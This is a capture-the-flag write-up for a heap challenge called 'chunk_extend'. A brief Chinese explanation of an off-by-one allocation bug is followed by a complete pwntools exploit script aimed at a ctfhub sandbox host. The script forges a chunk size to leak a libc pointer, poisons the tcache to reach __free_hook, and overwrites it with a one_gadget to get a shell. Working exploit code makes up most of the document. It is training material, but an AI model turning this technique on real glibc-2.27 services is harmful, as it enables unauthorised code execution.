漏洞点
add 这里如果 index 0 ~ 9 都已申请了 chunk,那么要到 i = 10 才退出 for 循环,但是之后还会接着用 ptr[10] = malloc(ptr[20]) 申请 chunk,从而实现 index 0 的堆块溢出
也就是说 add 可以覆盖掉第一个 chunk 的 size
最后第 11 个 chunk 的 size 会变得非常大,此时编辑 chunk0 就可以实现溢出
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')

# Challenge binary and the libc shipped with it; the remote target is the
# CTF sandbox instance, the commented line runs the binary locally instead.
pwnfile = "./chunk_extend"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",30492)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")


# Thin wrappers over the tube, written as named functions so tracebacks
# point at a real name instead of "<lambda>".
def s(data):
    """Send *data* unchanged."""
    return io.send(data)


def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return io.sendafter(delim, data)


def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)


def sla(delim, data):
    """Wait for *delim*, then send *data* followed by a newline."""
    return io.sendlineafter(delim, data)


def r(num=4096):
    """Receive up to *num* bytes (a short read is possible)."""
    return io.recv(num)


def ru(delims):
    """Receive until *delims* has been seen."""
    return io.recvuntil(delims)


def itr():
    """Hand the connection over to the terminal."""
    return io.interactive()


def uu32(data):
    """Unpack up to four little-endian bytes as an unsigned 32-bit int."""
    return u32(data.ljust(4,b'\x00'))


def uu64(data):
    """Unpack up to eight little-endian bytes as an unsigned 64-bit int."""
    return u64(data.ljust(8,b'\x00'))


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success('{} = {:#x}'.format(name, addr))


def lg(address, data):
    """Log *data* as hex, prefixed with the label *address*."""
    return log.success('%s: '%(address)+hex(data))
def add(size):
    """Menu option 1: ask the service to allocate a chunk of *size* bytes.

    Answers each prompt in turn; the size is sent as its decimal text.
    """
    for prompt, answer in ((b"choice: ", b"1"), (b"size:", str(size))):
        ru(prompt)
        sl(answer)
def free(idx):
    """Menu option 2: release the chunk held in slot *idx*.

    Answers each prompt in turn; the index is sent as its decimal text.
    """
    for prompt, answer in ((b"choice: ", b"2"), (b"idx:", str(idx))):
        ru(prompt)
        sl(answer)
def edit(idx,size,data):
    """Menu option 3: write *data* into slot *idx*, announcing *size* bytes.

    The length is whatever the caller passes. NOTE(review): the note above
    relies on the service not checking it against the slot's real
    allocation — confirm in the binary; a bounds check there is the fix.
    """
    answers = (
        (b"choice: ", b"3"),
        (b"idx:", str(idx)),
        (b"size:", str(size)),
    )
    for prompt, answer in answers:
        ru(prompt)
        sl(answer)
    ru(b"content:")
    s(data)
def show(idx):
    """Menu option 4: have the service print the contents of slot *idx*."""
    for prompt, answer in ((b"choice: ", b"4"), (b"idx:", str(idx))):
        ru(prompt)
        sl(answer)
# Interaction sequence for the challenge described in the note above. Every
# step depends on the heap state left by the one before it, so the order is
# fixed and must not be rearranged.
# Root cause as the note describes it: add() keeps allocating once slots 0..9
# are used, the extra allocation can change the first chunk's size, and after
# that edit(0, ...) writes past chunk 0. Bounds-checking the slot index and
# limiting edit() to the slot's real allocation size would close both.
add(0x10)
# Ten further 0x80-byte requests; the note above places the faulty
# allocation at index 10.
for i in range(1,11):
    add(0x80)
# 0x100 bytes into chunk 0, which was requested with only 0x10: three zero
# qwords followed by 0x481, used as a fake size for what follows chunk 0.
edit(0,0x100,p64(0)*3+p64(0x481))
free(1)
# Refill chunk 0 with a 0x20-byte marker, then read what show(0) prints
# right after that marker.
edit(0,0x100,b"a"*0x20)
show(0)
ru(b"a"*0x20)
# Six bytes following the marker, padded and unpacked as a pointer; the
# arithmetic below treats it as main_arena+96 (glibc-2.27 layout assumed —
# confirm against the bundled libc).
main_arena = uu64(r(6))
# Put a plausible size (0x91) back on the following chunk before allocating.
edit(0,0x100,p64(0)*3+p64(0x91))
add(0x80)
# libc base = leaked pointer - 96 - 0x10 - symbol offset of __malloc_hook.
libc_base = main_arena-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_base+libc.sym['__free_hook']
# Candidate offsets into libc-2.27.so (named one_gadget by the author); the
# second entry is the one used.
gadget = [0x10a38c,0x4f322,0x4f2c5]
one_gadget = libc_base+gadget[1]
print("libc_base------------->: ",hex(libc_base))
print("free_hook------------>: ",hex(free_hook))
free(2)
free(1)
# Same overflow as before, with free_hook written into the qword after the
# restored size field. NOTE(review): the two add(0x80) calls that follow are
# expected to make slot 2 refer to that address — depends on glibc internals,
# verify.
edit(0,0x100,p64(0)*3+p64(0x91)+p64(free_hook))
add(0x80)
add(0x80)
# Slot 2 receives the gadget address; the free() afterwards is what the
# author uses to exercise it, then the tube is handed to the terminal.
edit(2,0x8,p64(one_gadget))
free(5)
itr()